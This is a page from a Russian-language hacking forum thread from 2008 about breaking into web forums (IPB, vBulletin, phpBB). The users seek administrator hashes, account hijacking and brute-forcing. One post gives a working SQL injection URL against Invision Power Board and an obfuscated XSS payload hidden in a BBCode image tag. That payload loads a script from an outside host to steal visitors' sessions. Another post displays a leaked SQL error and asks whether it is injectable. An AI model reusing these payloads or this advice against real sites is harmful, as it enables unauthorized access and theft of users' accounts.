ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 16.07.2008, 18:28
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

OMG!!, а если попробовать поискать на milw0rm.com или Securitylab.ru эксплоиты? Какие цели ты преследуешь? Поломать любыми способами? Или утянуть хеш администратора?
 
Ответить с цитированием

  #52  
Старый 16.07.2008, 18:55
OMG!!
Постоянный
Регистрация: 25.02.2008
Сообщений: 331
Провел на форуме:
1073404

Репутация: 189
По умолчанию

Ershik, являясь администратором ресурсов в своей сети.. хеш админа на этом форуме у меня есть.. буду надеятся, что он совпадет с админкой на его форуме.. но хеш жесток, и пока его не взломали. Цель - получить доступ к кое-чему на этом сервере. Самое дырявое на том ресурсе - пожалуй сайт на джумле ( проверял все компоненты.. ничего путного нет ) и этот форум.. :-) вот..
 
Ответить с цитированием

  #53  
Старый 17.07.2008, 21:55
LamerNAH
Новичок
Регистрация: 05.11.2006
Сообщений: 2
Провел на форуме:
7747

Репутация: 0
По умолчанию

Я не понял 1)xss(активные и пассивные)
Смотрите значит я пишу просто пост вставляю этот когд потом юзер что должен сделать? нажать на мой пост или нажать на тот код или как? и потом на какой снифер должны прийти кукис? как я с того снифера смогу их достать?
 
Ответить с цитированием

  #54  
Старый 22.07.2008, 21:53
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

hi мне на форуме нужно 200 постов чтоб инфу читать..
Цитата:
allcheats.ru/t47219/
мне бы любой акк с 200 месагами..
стоит булка переделанная, брут будет долго... хсс.. чтот не разкрутил..модулей не обнаружил.
короче) вопрос КАК можно чтото сделать?


OMG!!
IPB 2.1.7 remote password changer будет работать только есть debug level = 3
осталась скуля:
Цитата:
index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&star ter=1+union+select+1/*
и хсс:
Цитата:
[img]http://www.vital.h.com.ua/[snapback] onerror=script=document.createElement(String.fromC harCode(115,99,114,
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
head=document.getElementsByTagName(String.fromChar Code(104,101,97,100)).item(0),head.appendChild(scr ipt)
style=visibility:hidden =[/snapback].gif[/img]

Последний раз редактировалось sabe; 22.07.2008 в 22:01..
 
Ответить с цитированием

  #55  
Старый 01.08.2008, 00:03
mash16
Новичок
Регистрация: 30.07.2008
Сообщений: 1
Провел на форуме:
41591

Репутация: -1
По умолчанию

Знатоки,помогите:

forum/weblogs_news.php?=&order=&start=-20

пишет:

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 7

SELECT e.entry_id, e.entry_access, e.entry_subject, e.entry_time, e.entry_views, e.entry_poster_id, e.entry_text, e.bbcode_uid, e.entry_mood, e.entry_currently, e.currently_text, e.entry_replies, u.user_id, u.username FROM weblog_entries AS e, users AS u WHERE entry_access <= 0 AND e.entry_poster_id = u.user_id AND e.entry_deleted <> 1 ORDER BY entry_id DESC LIMIT -20, 20

Line : 150
File : weblogs_news.php

здесь можно сделать SQL inj?
 
Ответить с цитированием

  #56  
Старый 01.08.2008, 23:22
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

mash16
иньекция как я понимаю в лимите..
 
Ответить с цитированием

  #57  
Старый 06.11.2008, 17:38
kentuss
Новичок
Регистрация: 29.03.2008
Сообщений: 4
Провел на форуме:
18379

Репутация: -1
По умолчанию

как узнать пароль админа на форуме Invision Power Board v1.3.1 Final ?? помогите плиз
 
Ответить с цитированием

  #58  
Старый 02.12.2008, 15:29
RomaM65
Новичок
Регистрация: 01.12.2008
Сообщений: 10
Провел на форуме:
10359

Репутация: 0
По умолчанию

Люди а не подскажете как можно брутить форумы на phpBB а то у меня акк угнали а я надеюсь вернуть брутом или чем нить другим я лично форум ломать не хочу а только свой акк вернуть
Плизз поделитесь опыцтом в етих делах с чего начать или кратко поясните
 
Ответить с цитированием

  #59  
Старый 15.12.2008, 18:29
AzzkyAspid
Новичок
Регистрация: 21.03.2007
Сообщений: 10
Провел на форуме:
131299

Репутация: 6
По умолчанию

Товарищи, прошу помочь!

Дано: форум Bulletin® v3.8.0 Release Candidate 1, мой аккаунт с правами юзера.

Необходимо: удалить свой профиль.

Решение: как????

Доп.инфа: облазил всю вкладку Мой кабинет - нет и намека на кнопку "Удалить профиль".
 
Ответить с цитированием

  #60  
Старый 16.12.2008, 02:55
1ce666
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
Провел на форуме:
2144019

Репутация: 214
По умолчанию

Можно как нибудь угнать акк на двиге VBulletin 3.6.6 ???
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Внимание! Найдена уязвимость форумов на offtop.ru! Black_Kardinal Форумы 14 09.01.2006 13:58
Помощь по взлому Ipb 2.1.1 Snake Форумы 24 22.11.2005 15:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ